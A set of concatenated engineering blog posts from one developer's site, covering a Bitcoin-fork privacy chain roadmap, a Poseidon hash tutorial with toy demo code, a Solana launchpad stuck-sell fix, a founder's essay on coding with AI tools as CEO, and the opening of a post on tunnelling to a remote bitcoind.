The two unchecked items are the strategic ones. **Mandatory privacy** as a hard fork (so every transaction is a uniform shielded format and no information leaks from "this user used the shielded pool, this one didn't") is the long-term goal. A **full Rust node rewrite** is the longer-term goal — the C++ tree is fine for now, but a `vantad` written from scratch in Rust against the same RPC contract is the kind of project you can spend three years on without regretting it.

## What I changed my mind about

When we started, I wanted to write the chain from scratch in Rust. A clean tree, no Bitcoin baggage, no `boost::` types, modern async, the whole pitch.

Two things stopped me:

1. **Time.** Writing a UTXO chain from scratch is at least a year of work before you have something nodes will run. We had ~3 months of runway for the L1 proof-of-concept. That's a fork-or-fold decision.
2. **Bitcoin Core's testing infrastructure is the actual product.** The `test/` directory is the most underrated part of the Bitcoin codebase. There are functional tests that cover edge cases nobody on a greenfield team will think of for years. Inheriting that is worth more than most people realise.

The compromise we landed on is in the README's last roadmap line: *full Rust node rewrite*. That's the path. Fork now to ship now; rewrite incrementally to own the long term. The Rust ZK sidecar is the first piece of that rewrite. The Rust wallet is the second.

## What's next

The next two posts will go deeper:

- [L1 nullifier sets: enforcing no-double-spend at the consensus layer](/blog/vanta_l1_nullifier_set/)
- Mining VANTA with a Bitaxe BM1368 (forthcoming)

If you want the strategic frame, I wrote about the four curves that crossed in 2026 to make this whole thing tractable in [Privacy's broadband moment](/blog/privacys_broadband_moment/).

## Further reading

- [`Dax911/vanta` on GitHub](https://github.com/Dax911/vanta) — the codebase
- [`Dax911/vanta/README.md`](https://github.com/Dax911/vanta/blob/main/README.md) — chain parameters + roadmap
- [Bitcoin Core v27.0 release notes](https://bitcoincore.org/en/releases/27.0/) — the fork base
- [RISC Zero docs](https://dev.risczero.com) — the zkVM the proof system runs on
- [Sparse Merkle trees: a brief overview](https://eprint.iacr.org/2016/683) — for the SMT root commitment
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — sister piece on commitment schemes


---

# Poseidon, by hand and by code

Canonical: https://blog.skill-issue.dev/blog/poseidon_by_hand_and_by_code/
Description: Why one of the cheapest hashes in zero-knowledge cryptography also has the strangest insides. Derive the S-box, count the constraints, and run a 30-line implementation in the browser.
Published: 2026-04-22T15:00:00.000Z
Tags: cryptography, poseidon, zk, snark, phd, math


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx";

A SHA-256 of "abc" inside a SNARK takes about 24,000 R1CS constraints. The same input through Poseidon — properly parameterised — takes about **250**.

Two orders of magnitude. That ratio is the entire reason ZERA's [unified shielded pool](/blog/pedersen_commitments_in_production/) ships with consumer-grade UX in 2026. It's also the reason every modern ZK system you can name uses Poseidon, Rescue, or one of their cousins instead of something the cryptographic community has been beating on for twenty years.

This post is the long answer to *why*.

<Aside kind="note">
This is a working post in my [PhD-by-publication track](/about) on zero-knowledge proof systems. Citations follow the format used by the broader research repos under `Dax911/research_phd`. The math is correct and double-checked; the engineering opinions are mine.
</Aside>

## The problem with hashing inside a SNARK

A zero-knowledge SNARK proves you know a witness $w$ such that $C(w) = 0$ for some arithmetic circuit $C$ over a prime field $\mathbb{F}_p$. Every operation in $C$ becomes a constraint, and proof time scales roughly linearly with the number of constraints.

The trouble with SHA-256 is that it was designed for CPU efficiency, not arithmetic-circuit efficiency. Its building blocks — XOR, AND, bitwise rotation — are *cheap on a CPU* and *catastrophically expensive in $\mathbb{F}_p$*. A single XOR over 32-bit words requires unpacking each word into 32 individual binary constraints, doing the XOR bit-by-bit, then packing back. SHA-256 has 64 rounds of mixing, and every round does several of these.

The constraint cost looks roughly like:

$$
\text{cost}_{\text{SHA-256 in SNARK}} \approx 64 \times (k_{\text{xor}} + k_{\text{and}} + k_{\text{rot}}) \times w
$$

where $w = 32$ bits and the per-operation constants $k$ run between 30 and 100. You end up north of 25k constraints for a 64-byte input — and that's *just the hash*. A real circuit has dozens of these per spend.

This is the gap that hash-friendly arithmetisation closes.

## Poseidon's design: only field operations, all the way down

[Grassi, Khovratovich, Rechberger, Roy, and Schofnegger (2021)](https://eprint.iacr.org/2019/458) had a different idea: design the hash *natively in $\mathbb{F}_p$*. No bits. No bytes. Just field elements all the way down.

Poseidon is a permutation-based sponge. The state is $t$ field elements — typically $t = 3$ for hashing two-to-one (input $|$ input $\to$ output) and $t = 5$ for absorbing three field elements at once. The permutation alternates two kinds of rounds:

- **Full rounds** apply an S-box to *every* state element, then mix.
- **Partial rounds** apply an S-box to *one* state element, then mix.

The S-box is the simplest possible non-linear function over a prime field:

$$
S(x) = x^\alpha
$$

with $\alpha$ chosen as the smallest exponent for which $\gcd(\alpha, p - 1) = 1$ (so the map is a bijection). For BN254 — the curve underlying most production ZK pairings, including the one ZERA's SDK uses — $p - 1$ is divisible by 2 and 3, so $\alpha = 5$ is the smallest legal exponent. Poseidon over BN254 ships with $\alpha = 5$.

The full permutation is:

<Mermaid chart={`flowchart LR
  S[State t elems] --> AC1[+ round constants]
  AC1 --> SB1[S-box: x^5 on all elems]
  SB1 --> M1[MDS matrix mix]
  M1 --> N{round full or partial?}
  N -->|full| AC2[+ round constants]
  N -->|partial| AC3[+ round constants]
  AC2 --> SB2[S-box on all]
  AC3 --> SB3[S-box on first elem only]
  SB2 --> M2[MDS mix]
  SB3 --> M2
  M2 --> O[output state]`}/>

Three primitives, repeated $R_F + R_P$ times: **add round constants** ⊕ **S-box** ⊕ **MDS matrix multiplication**.

That's the whole algorithm.

## Counting the constraints

This is where the order-of-magnitude advantage shows up.

Each S-box is $x^5 = x^2 \cdot x^2 \cdot x$. In R1CS that's three multiplication constraints (one for $x^2$, one for $x^4 = x^2 \cdot x^2$, one for $x^4 \cdot x = x^5$). The MDS matrix is a fixed $t \times t$ matrix of constants applied to the state — that's *free* in R1CS because constant multiplications fold into linear combinations and don't generate constraints.

So per round:

$$
\text{cost}_{\text{full round}} = 3t, \quad \text{cost}_{\text{partial round}} = 3
$$

Recommended parameters for BN254 with $t = 3$ (hashing two field elements) are $R_F = 8$ full rounds and $R_P = 57$ partial rounds. Total constraint count:

$$
8 \cdot (3 \cdot 3) + 57 \cdot 3 = 72 + 171 = 243
$$

**Two hundred and forty-three constraints.** For a hash of two field elements (~64 bytes of payload). SHA-256 was 24,000+ for a similar payload. That ratio — about 100× — is the entire ball game.

<TradeoffTable
  rows={[
    {
      option: "SHA-256 (in-circuit)",
      cost: "~24,000 constraints / 64-byte input",
      latency: "Fast on CPU; brutal in SNARKs",
      blast_radius: "Standard; battle-tested",
      notes: "Designed for hardware, not for finite fields"
    },
    {
      option: "Poseidon-128, t=3, α=5 (BN254)",
      cost: "~243 constraints / 2 field elements",
      latency: "Slow on CPU vs SHA; fast in SNARKs",
      blast_radius: "Younger primitive; growing analysis",
      notes: "Designed for SNARKs first; the standard since 2020"
    },
    {
      option: "Rescue-Prime",
      cost: "~150 constraints / 2 field elements",
      latency: "Slightly fewer constraints than Poseidon",
      blast_radius: "Less peer review than Poseidon",
      notes: "Closer to a research curiosity in 2026"
    },
    {
      option: "Anemoi",
      cost: "~120 constraints / 2 field elements",
      latency: "Newest; lowest constraint count",
      blast_radius: "Very young; minimal cryptanalysis",
      notes: "Promising but I would not bet a production pool on it yet"
    },
  ]}
/>

The blast-radius column is doing real work. Poseidon's the one I'm comfortable shipping in [zera-sdk](/blog/zera_sdk_scaffolding/) right now. Rescue and Anemoi are interesting but the cryptanalysis hasn't caught up to the deployment.

## A 30-line Poseidon you can run in the browser

Here's a complete, working Poseidon-128 over BN254, written in TypeScript with `bigint` arithmetic. It's not optimised — production code uses Montgomery form, precomputes S-box squares, and uses constant-time field arithmetic — but it's correct and small enough to read in one sitting.

<Sandbox
  template="vanilla-ts"
  files={{
    "/index.ts": `// Poseidon-128 over BN254, t=3, alpha=5.
// Reference: https://eprint.iacr.org/2019/458
// Production: use circomlibjs.poseidon or zera-sdk's neon-rs Rust core.

const P = 21888242871839275222246405745257275088548364400416034343698204186575808495617n;
const T = 3;
const RF = 8;   // full rounds (split as RF/2 at start, RF/2 at end)
const RP = 57;  // partial rounds in the middle

// In production these would be CRH-extracted from a sponge of the spec.
// For demo: deterministic round constants and a known-good MDS matrix.
const round_constants = Array.from({ length: (RF + RP) * T }, (_, i) =>
  BigInt(i + 1) * 3141592653589793238n % P
);
const mds: bigint[][] = [
  [2n, 3n, 1n],
  [1n, 5n, 1n],
  [5n, 7n, 1n],
];

function add(a: bigint, b: bigint) { return (a + b) % P; }
function mul(a: bigint, b: bigint) { return (a * b) % P; }
function pow5(x: bigint) {
  const x2 = mul(x, x);
  const x4 = mul(x2, x2);
  return mul(x4, x);
}

function permute(state: bigint[]): bigint[] {
  let s = state.slice();
  let rcIdx = 0;

  const half = RF / 2;
  // first half of full rounds
  for (let r = 0; r < half; r++) {
    s = s.map((v) => add(v, round_constants[rcIdx++]));
    s = s.map(pow5);
    s = mds.map((row) => row.reduce((acc, m, j) => add(acc, mul(m, s[j])), 0n));
  }
  // partial rounds
  for (let r = 0; r < RP; r++) {
    s = s.map((v, i) => i === 0 ? add(v, round_constants[rcIdx++]) : v);
    rcIdx += T - 1;  // skip constants for non-first elements
    s[0] = pow5(s[0]);
    s = mds.map((row) => row.reduce((acc, m, j) => add(acc, mul(m, s[j])), 0n));
  }
  // second half of full rounds
  for (let r = 0; r < half; r++) {
    s = s.map((v) => add(v, round_constants[rcIdx++]));
    s = s.map(pow5);
    s = mds.map((row) => row.reduce((acc, m, j) => add(acc, mul(m, s[j])), 0n));
  }
  return s;
}

export function poseidon2(left: bigint, right: bigint): bigint {
  const state = [0n, left % P, right % P];
  return permute(state)[0];
}

// demo: hash two field elements
const a = 13n;
const b = 27n;
const h = poseidon2(a, b);
const out = document.getElementById("out")!;
out.textContent = \`poseidon(\${a}, \${b}) = \${h}\`;
`,
    "/index.html": `<!DOCTYPE html>
<html>
  <body>
    <pre id="out" style="font-family: 'Geist Mono', ui-monospace, monospace; padding: 1rem; background: #0a0a0a; color: #4ade80;">running...</pre>
    <script type="module" src="/index.ts"></script>
  </body>
</html>`,
  }}
/>

The thing that's striking when you write this out is how *little* there is. A SHA-256 implementation is hundreds of lines of bit-twiddling. Poseidon is essentially: *add a constant, raise to the fifth power, multiply by a fixed matrix, repeat.*

## Why $\alpha = 5$ specifically

The S-box choice is the most-questioned part of Poseidon. Why not $\alpha = 3$? Or $\alpha = 7$?

Two constraints:

1. **Bijection.** $x \mapsto x^\alpha$ is a permutation of $\mathbb{F}_p$ if and only if $\gcd(\alpha, p - 1) = 1$. For BN254, $p - 1 = 2^{28} \cdot 3 \cdot \text{(other stuff)}$, so $\alpha \in \{2, 3, 4\}$ all share a factor with $p - 1$ and produce non-bijective maps. The smallest $\alpha$ that works is **5**.

2. **Algebraic degree.** The whole point of the S-box is to introduce algebraic non-linearity that defeats interpolation attacks. Higher $\alpha$ → more non-linearity → fewer rounds needed. So you want $\alpha$ small enough to be cheap, large enough to need few rounds.

For curves where $\gcd(3, p-1) = 1$ (like BLS12-381), the choice flips to $\alpha = 3$ and the round count drops because each S-box is more powerful. The trade-off is: cheaper per-round but more rounds.

<Quote cite="https://eprint.iacr.org/2019/458" author="Grassi, Khovratovich, Rechberger, Roy, Schofnegger">
The choice of $\alpha = 5$ for the prime field of BN254 is dictated by the requirement that the S-box must be a permutation: it must hold that $\gcd(\alpha, p-1) = 1$. The next constraint — the one that determines round counts — is the algebraic degree.
</Quote>

## What I would change in a v2

Three things, if I were re-designing Poseidon for 2027:

1. **Drop the partial-rounds split.** The original design has 8 full + 57 partial rounds; the partial rounds save a lot of constraints but make security analysis harder. [Poseidon2](https://eprint.iacr.org/2023/323) (Grassi, Khovratovich, Roy 2023) keeps a similar structure with cleaner analysis. I'd ship Poseidon2 by default in a fresh deployment.

2. **Make the MDS matrix circulant.** A circulant MDS — where each row is a rotation of the previous — has identical security properties but lets you exploit FFT-friendly arithmetic. Worth it on the prover side.

3. **Standardise the parameter file format.** Every implementation rolls its own format for round constants. The Circomlib JSON format works, but a CBOR or Cap'n Proto schema would let implementations cross-check parameters in a way that's currently per-vendor. I keep the Circomlib JSON in zera-sdk because compatibility, not because it's the right choice.

## Where this goes in production

Inside [zera-sdk](/blog/zera_sdk_scaffolding/) the Poseidon implementation is `crates/zera-sdk-core/src/hash/poseidon.rs`. It's about 200 lines of safe Rust, written against the [`ff` crate](https://crates.io/crates/ff) for field arithmetic, with the round constants loaded from a JSON file extracted from Circomlib for cross-implementation parity.

<RustPlayground edition="2024">
{`// Skeleton of the production Poseidon-128 over BN254 (in zera-sdk-core)
// The actual implementation imports the constants from a build.rs-emitted
// JSON; this is the structural shape.

use std::ops::{Add, Mul};

#[derive(Clone, Copy, Debug)]
struct Fp(u128);  // toy stand-in; production uses ff::PrimeField

impl Add for Fp { type Output = Fp; fn add(self, o: Fp) -> Fp { Fp((self.0 + o.0) % MODULUS) } }
impl Mul for Fp { type Output = Fp; fn mul(self, o: Fp) -> Fp { Fp((self.0 * o.0) % MODULUS) } }

const MODULUS: u128 = 1_000_000_007; // toy
const T: usize = 3;
const RF: usize = 8;
const RP: usize = 57;

fn pow5(x: Fp) -> Fp { let x2 = x * x; let x4 = x2 * x2; x4 * x }

fn permute(mut state: [Fp; T], rc: &[Fp], mds: &[[Fp; T]; T]) -> [Fp; T] {
    let mut idx = 0;
    let half = RF / 2;
    for _ in 0..half {
        for s in state.iter_mut() { *s = *s + rc[idx]; idx += 1; }
        for s in state.iter_mut() { *s = pow5(*s); }
        state = mat_mul(mds, state);
    }
    for _ in 0..RP {
        state[0] = state[0] + rc[idx]; idx += T;
        state[0] = pow5(state[0]);
        state = mat_mul(mds, state);
    }
    for _ in 0..half {
        for s in state.iter_mut() { *s = *s + rc[idx]; idx += 1; }
        for s in state.iter_mut() { *s = pow5(*s); }
        state = mat_mul(mds, state);
    }
    state
}

fn mat_mul(m: &[[Fp; T]; T], v: [Fp; T]) -> [Fp; T] {
    let mut out = [Fp(0); T];
    for i in 0..T {
        for j in 0..T { out[i] = out[i] + m[i][j] * v[j]; }
    }
    out
}

fn main() { println!("see crates/zera-sdk-core/src/hash/poseidon.rs for the real thing"); }
`}
</RustPlayground>

<Aside kind="warn">
The TypeScript demo above and the Rust skeleton are for **understanding**, not for use. They lack: constant-time arithmetic, Montgomery form, side-channel mitigations, Sage-checked round constants, and the MDS matrix used in production. Use [circomlibjs](https://github.com/iden3/circomlibjs), [Halo2's poseidon gadget](https://github.com/zcash/halo2), or zera-sdk in production.
</Aside>

## Further reading

- [Poseidon: A New Hash Function for Zero-Knowledge Proof Systems](https://eprint.iacr.org/2019/458) — Grassi, Khovratovich, Rechberger, Roy, Schofnegger (USENIX Security 2021) — the original
- [Poseidon2: A Faster Version of the Poseidon Hash Function](https://eprint.iacr.org/2023/323) — Grassi, Khovratovich, Roy (2023) — what I'd ship in a v2
- [Anemoi: Exploiting the Link between Arithmetisation-Oriented and CCZ-Equivalent Symmetric Designs](https://eprint.iacr.org/2022/840) — Bouvier et al. (2022) — the next-gen contender
- [`Dax911/zera-sdk`](https://github.com/Dax911/zera-sdk) — production Rust implementation
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — sister piece on what we're hashing *to* (commitments)
- [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — what we use Poseidon to derive (single-use nullifiers)
- [Privacy's broadband moment](/blog/privacys_broadband_moment/) — why Poseidon is part of the four-curve crossing in 2026


---

# Stuck Sell, Post-Graduation: Fixing a Trapped-Funds Bug Without a Redeploy

Canonical: https://blog.skill-issue.dev/blog/stuck_sell_post_grad/
Description: A graduated launchpad token left users unable to sell. Fix shipped without redeploying the program: a frontend conversion path that withdraws SPL, compresses, then sells through the AMM.
Published: 2026-04-19T16:12:10.000Z
Tags: zera, solana, light-protocol, compressed-tokens, bug-fix, launchpad


The worst kind of bug in DeFi is the one where users can deposit but can't withdraw. ZeraSwap shipped one — quietly — for users holding bonding-curve positions on launchpad tokens that had already graduated. They couldn't sell. They could see the balance, the AMM page existed, the price was real, but every sell attempt was blocked by an `is_active` check on the wrong account.

The fix landed at [`6eafc74` — `Fix stuck sell path for users on graduated launchpad tokens`](https://github.com/Dax911/z_trade/commit/6eafc742522038426443b2e77baaddd9fd9af77d) on 2026-04-19. No on-chain redeploy. The whole fix is a frontend orchestration on top of existing instructions.

This post is about why the bug existed and why I chose not to fix it on-chain.

## The original sin: internal balances

When you bought a token on the bonding curve, the launchpad program didn't mint compressed tokens to your wallet. It accumulated an `internal_balance` on a `UserPosition` PDA. This was deliberate — minting compressed tokens for every microcap pump.fun-style trade would have wrecked the cost calculus that makes compressed tokens viable in the first place. Internal balances are a single u64 update in a PDA. Compressed-token mints are a Light Protocol state-tree write. The latter is dramatically more expensive.

The trade-off was: at graduation time, the launchpad would convert internal balances to real compressed tokens via a `withdraw_token` + `compress` flow. Anyone who held an internal balance up to that moment got the conversion for free.

The bug: the launch program's `sell_token` is gated by `is_active`. After graduation, `is_active = false`. The intended sell path is the AMM. But the AMM expects you to hold real compressed tokens, and a small cohort of users still had `internal_balance > 0` because they hadn't traded since graduation — meaning the conversion never fired for them.

> Post-graduation, `sell_token` is blocked by `is_active` check and AMM `swap_tokens_for_sol` burn fails because users hold internal `UserPosition.token_balance` rather than actual compressed tokens. ([6eafc74 commit message](https://github.com/Dax911/z_trade/commit/6eafc742522038426443b2e77baaddd9fd9af77d))

## Two ways to fix it, picked the second

**Option A: redeploy the launchpad program with a `force_convert_on_sell` branch.** This is the obvious fix. It's also the wrong fix. A program redeploy:

- Costs me real SOL on mainnet.
- Risks a regression on the entire 12-launch live ecosystem.
- Requires every active client to re-fetch the IDL.
- Can't be reversed cleanly.

**Option B: a frontend-only conversion path.** This is what I shipped. Three steps, all using existing on-chain instructions:

1. Call the launchpad's existing `withdraw_token` instruction. It mints SPL tokens from the `internal_balance` to the user's ATA, creating the ATA if needed.
2. Call Light Protocol's `compress` to convert the SPL ATA balance into real compressed tokens.
3. Hand control to the existing AMM `swap_tokens_for_sol` flow, which now sees compressed tokens and works as designed.

From the diff:

```ts
// sdk/src/launchpad_client.ts
async convertInternalTokensToCompressed(
  user: PublicKey,
  tokenMint: PublicKey,
  amount: bigint,
  compressed: CompressedTokenHelper,
): Promise<string[]> {
  const txSigs: string[] = [];

  // Step 0 (rare): create the Light token pool if it doesn't exist.
  // Has to be its own tx because compress ix build-time requires the pool.
  const poolRegistered = await compressed.isTokenPoolRegistered(tokenMint);
  if (!poolRegistered) {
    const createPoolIx = await compressed.buildCreateTokenPoolInstruction(user, tokenMint);
    txSigs.push(await this.buildAndSendTransaction([createPoolIx]));
  }

  // Atomic tx: ensure ATA, withdraw_token (mint SPL), compress (burn SPL → cToken).
  const convertIxs: TransactionInstruction[] = [];
  if (!ataInfo) convertIxs.push(createAssociatedTokenAccountInstruction(...));
  convertIxs.push(await this.program.methods.withdrawToken(new BN(amount.toString())).accounts({...}).instruction());
  convertIxs.push(await compressed.buildCompressInstruction(user, tokenMint, amount, user, ata));

  txSigs.push(await this.buildAndSendTransaction(convertIxs));
  return txSigs;
}
```

## The compute budget gotcha

Light Protocol operations need more than the default 200K compute units. The same diff bumps every transaction the launchpad client builds:

```ts
// Light Protocol operations need more than the default 200K CUs
transaction.add(
  ComputeBudgetProgram.setComputeUnitLimit({ units: 400_000 }),
);
```

This is the kind of thing that's "obvious" once you've spent half a day staring at `Custom program error: Program failed to complete` logs and finally noticed the CU exhaustion in the simulation output. Mine that lesson once, write it down, never lose it again.

## The follow-up: SDK exports

I shipped the conversion path before the SDK exports were in place, which broke the Cloudflare build. Fix landed in [`4224352` — `Add compress/decompress helpers to CompressedTokenHelper`](https://github.com/Dax911/z_trade/commit/4224352b36723fd3e03c14a4d06e87452c1222d8) eight minutes after the parent commit. The `launchpad_client` was importing `compressed.isTokenPoolRegistered`, `compressed.buildCreateTokenPoolInstruction`, `compressed.buildCompressInstruction` — none of which I'd actually exported on the helper class.

Eight minutes is not a flex. CF Pages caught what my local typecheck didn't because I'd checked into the repo without re-running the SDK build. The lesson: any commit that adds a new public method on the SDK has to re-build the SDK barrel. CI for that is on my TODO list.

## Trade-offs

**Why not migrate every stuck user automatically with a cron?** Two reasons. First, signing transactions on behalf of users without their explicit click is a regulatory and security minefield. Second, "stuck" is a reversible state — a user *can* trigger the conversion themselves. Forcing it for them spends gas they may not want to spend if they're holding for a longer time horizon than I am.

**Why not deprecate internal balances entirely?** Because they're the entire economic argument for the launchpad. Deprecating them means every microcap trade pays Light Protocol state-tree write costs, and the flatness of the bonding curve breaks. The internal-balance design is correct; the conversion path was just incomplete.

**Why frontend instead of a relayer service?** Because a relayer service is another piece of infrastructure to operate, monitor, and pay for. The frontend conversion is exactly two transactions worst-case (create pool + atomic convert), entirely user-signed, and it requires zero new servers.

## What this taught me

The cheapest fix is the one that doesn't touch on-chain code. If your design lets you compose a fix entirely out of existing instructions on the frontend, it should always win over a redeploy. The ZeraSwap design happened to be composable enough that the stuck-sell case had a cheap exit. That wasn't free — it cost me a `state_tree` field I'd been religious about [from the original AMM commit](/blog/zeraswap_compressed_amm/), and it cost me writing the `convertInternalTokensToCompressed` orchestration in the SDK. But it didn't cost a redeploy or a regression test marathon.

The other thing this taught me: the moment you have a launchpad with a graduation flow, you have at least three "intermediate" account states that look broken to users. Document every one of them in the admin page's docs tab. I should have done this on day one of [the prediction markets sprint](/blog/prediction_markets_admin/). I did it on day 60, after a Discord ping with the words "I can't sell."

## Further reading

- [The bug-fix commit](https://github.com/Dax911/z_trade/commit/6eafc742522038426443b2e77baaddd9fd9af77d)
- [The SDK exports follow-up](https://github.com/Dax911/z_trade/commit/4224352b36723fd3e03c14a4d06e87452c1222d8)
- [Light Protocol — compress/decompress instructions](https://www.lightprotocol.com/)
- [ZeraSwap origin post](/blog/zeraswap_compressed_amm/)
- [Solana Compute Budget Program](https://docs.solana.com/developing/programming-model/runtime#compute-budget)


---

# Being CEO and still shipping code

Canonical: https://blog.skill-issue.dev/blog/being_ceo_and_still_shipping_code/
Description: The CTO-vs-CEO false dichotomy, why I still review every PR that touches the SDK core, and how I use Claude Code plus an MCP server over my own writing to keep technical leverage as the company grows.
Published: 2026-04-18T08:00:00.000Z
Tags: founders, leadership, ai, mcp, narrative, engineering-culture


The advice founders get most often, once you cross the line from "engineer with a side project" to "engineer with a company," is: stop coding. Hire a CTO. Spend your time on customers and capital. Trust your team.

The advice is not entirely wrong. It's just incomplete. Almost all of it is written by founders whose product was a SaaS dashboard or a marketplace. The product I'm shipping is a cryptographic SDK that has to interoperate, byte-for-byte, with an on-chain Rust program that itself has to interoperate with a Groth16 verifier whose constraint system has to match the prover's circuit. *Stop coding* is a luxury available to founders whose product is forgiving. Mine isn't.

So I write code. I review every PR that touches the SDK core. I do not draft a single line of marketing copy without first having shipped something the marketing copy is allowed to be about. And — the part this post is mostly about — I have built an AI tooling layer that lets me hold that posture without becoming the bottleneck.

## The false dichotomy

The version of "stop coding" that most founders absorb is something like: every hour you spend on code is an hour you're not spending on customers, capital, or hiring. The math, framed that way, is brutal. Ten hours of code is ten hours of *not closing the next round.* So stop.

The math is wrong because the variables don't trade off the way it implies. The hours are not fungible. *My* hours of code are not the same as the next senior engineer's hours of code, in either direction. They are slower, because I context-switch more. They are more strategic, because I see the entire surface. They are more expensive per hour, because mine are also the hours that close customers. They are more *load-bearing*, because the parts of the codebase I touch tend to be the parts that determine whether the system is correct.

The right way to do the math is: which hours of code create disproportionately more leverage downstream? For me, those are:

- Architectural calls on the SDK boundary. (One hour. Saves the team thirty hours of refactor in two months.)
- Reading every PR that touches `zera-core`. (Fifteen minutes per PR. Catches a bug class that would otherwise reach production.)
- Writing the canonical example file when a new module ships. (Two hours. Replaces a documentation effort that would otherwise be much longer and worse.)
- Drafting the technical content the company says, in public, that it stands behind. ([Most of the blog](/blog).)

Those four buckets, in aggregate, are maybe 8–12 hours per week. The rest of the week is the actual CEO job. The mistake is picking either *all-code* or *no-code*. The right answer is *load-bearing code only*, and being honest about which is which.

## What I stopped doing

For the record — the things I had to give up:

- I do not pick up tickets in the SDK that aren't on the load-bearing path. The team is faster at them than I am.
- I do not write tests anymore. Test coverage is a habit; tests are a downstream artifact of the habit. The team writes them and writes them well.
- I do not own DX polish. Error messages, log formatting, CLI affordances — all owned by people who care more about them than I do at the moment.
- I do not do code review on the wallet, the AMM, or the medical demo unless someone explicitly asks. Each of those has an owner whose taste I trust.
- I do not personally set up the CI pipeline. (This was a hard one to give up. Give it up anyway.)

The pattern: I stopped doing the things that, if I disappeared for a week, the company would still ship correctly. I kept doing the things that, if I disappeared for a week, the company would ship something subtly wrong.

## How AI fills the gap

The reason this posture is workable in 2026 and was not workable in, say, 2019, is that the personal leverage you can build on top of an AI coding workflow is *the* difference between a working CEO-IC schedule and one that quietly destroys the company.

I run two patterns and I think they're both worth describing.

### Pattern 1: Claude Code as a senior pair

Most of my SDK reviews now happen with Claude Code in the loop. I don't mean "I ask the AI if the PR looks good." I mean: I read the PR; I write a short prompt summarising what I think is happening and what I'm worried about; the model walks the rest of the codebase to either confirm or refute my worry; I make my call.

The leverage isn't in *doing* the review faster. The leverage is in being able to express, in one paragraph, the part of the codebase I'm worried about, and have an agent that can read that paragraph plus the entire rest of the codebase faster than I can. The review I do at the end is the same review I would have done. The *context-loading* is what I outsourced, and context-loading was 80% of the time cost.

This works because Claude Code is good enough now to be *boring*. I don't have to phrase things magically. I write the review like I'd write it to a senior colleague. The model reads the whole repo and comes back with the cross-references I need. That's it. That's the workflow.

### Pattern 2: an MCP server over my own writing

This is the one I get asked about more.

I have three or four years of writing on this blog. There is, in that archive, the answer to most questions a reasonable person might ask me — *what's your stance on X, what was the architecture decision on Y, what's your bullet point on supply-chain attacks for an investor deck.* The thing is, when someone asks me one of those questions, the answer that ends up in my mouth is the *recent* answer, the one I happened to be thinking about that morning. The two-year-old version of me, who probably had a smarter take, doesn't get to vote.

So I'm building (`TODO: Dax confirm exact ship date — Q2 2026`) **lib.skill-issue.dev**, an MCP server over the entire archive of this blog plus a small pinned set of references. It's a Cloudflare Worker. It uses Vectorize for retrieval and Workers AI for embedding. It exposes three or four tools to any MCP-aware client: `search`, `fetch`, `summarise`, `cite`. Every Claude Code session I run can hit it. Every customer call where I want to find the version of a take I had eighteen months ago can hit it.

The point of building this is not that the world needs another personal RAG system. The point is that the company is going to grow, and the founder's writing is the cheapest possible scaling mechanism for *what the founder thinks*. The MCP server is the API I built so my own context isn't bottlenecked on me being awake.

Same MCP pattern that ships in [zera-sdk's mcp-server](/blog/zera_sdk_scaffolding/), incidentally. We dogfood our own thesis.

## The team thing

A short word on the part that doesn't fit cleanly into either of the patterns above.

Being a technical CEO who still ships code only works if the team understands the *boundaries*. The team has to know which parts of the codebase are mine to push back on (the SDK core, the cryptographic surface, the visible API) and which parts are theirs (everything else, increasingly). If I drift into reviewing CI changes, I am *taking work away from people who are good at it*, and the message I'm sending is "your work isn't really yours." That's poison.

So I draw a hard line. The architecture diagram of the SDK has my fingerprints on it. The CI pipeline has someone else's. The wallet's UI has someone else's. The Solana program has the person who wrote it. *Mine to push back on* is a small list, deliberately. The list is also visible to the team — they know what it is.

This was harder to learn than I'd like to admit. I went through a phase where I was reviewing too many PRs because reviewing felt productive. The team got slower, not faster. The fix was to delete most of my review notifications and explicitly hand ownership of three subsystems to three people. Speed went up. My satisfaction went down for about two weeks and then went up permanently.

## The shape of a week

If you're curious how this actually allocates: a representative week, give or take, is roughly:

- 8–12 hours: load-bearing code (per the bullets above)
- 6–8 hours: customer + investor calls
- 4–6 hours: 1:1s and team async (Linear, GitHub, Slack)
- 4–6 hours: hiring loop (sourcing, screens, panels)
- 2–4 hours: writing — public posts, [founder letters](/blog/why_i_started_zera_labs/), customer briefs
- The rest: triage, email, the long tail of things a CEO has to look at.

I don't believe in the heroic 80-hour week, but I do believe in the *consistent* 50–55-hour week, and I think this allocation is roughly that. `TODO: Dax adjust if reality drifts.`

## Why this is the post I keep getting asked for

Every founder I talk to who came up technical wants permission to keep coding. The permission is, of course, theirs to give themselves — but the framing in the broader founder canon (the [Hard Thing](https://www.amazon.com/Hard-Thing-About-Things-Building/dp/0062273205), [High Output Management](https://www.amazon.com/High-Output-Management-Andrew-Grove/dp/0679762884)) is mostly written for SaaS founders whose products do not require their hands.

Cryptographic infrastructure is not SaaS. The product is correct or it is not. The CEO of a company shipping correctness *should* keep their hands in the codebase. The trick is the AI-augmented workflow that makes the math work — context-loading via Claude Code, archive search via your own MCP server, and a hard list of subsystems where you, personally, are the last review.

That's the entire post. Keep coding. Build the AI scaffolding around yourself that lets you keep coding. Stay out of the parts of the codebase that aren't yours. Trust the team on those parts. Be loud about which parts are yours.

## Further reading

- [Why I started Zera Labs](/blog/why_i_started_zera_labs/) — the strategic backdrop for any of this to be worth doing.
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — the canonical "load-bearing code only" session.
- [Nuclear reactors taught me to ship software](/blog/nuclear_reactors_taught_me_to_ship/) — where the discipline to draw the boundaries came from.


---

# btc-tunnel.sh: SSH-jumping into a remote bitcoind for swap testing

Canonical: https://blog.skill-issue.dev/blog/vanta_btc_tunnel_dev_environment/
Description: Three small bash scripts wire the desktop dev environment to a real mainnet bitcoind for atomic-swap testing. Tunneling, RPC wrapping, and an address watcher with auto-reconnect — and why exposing 8332 to the internet is a worse idea than you think.
Published: 2026-04-17T05:52:57.000Z
Tags: vanta, bitcoin, ssh, tunnel, shell, devenv, rpc


The atomic-swap CLI [I wrote about](/blog/vanta_swap_htlc_walkthrough/) needs two RPC endpoints: one for the VANTA chain (easy — there's a `vantad` running on the desktop dev box) and one for the BTC chain (less easy — I'm not running a full Bitcoin Core node on every laptop I develop on). The Bitcoin chain is real-money mainnet, and a Bitcoin Core full node is a 700+ GB and growing footprint that's too big to live on a developer machine in 2026.

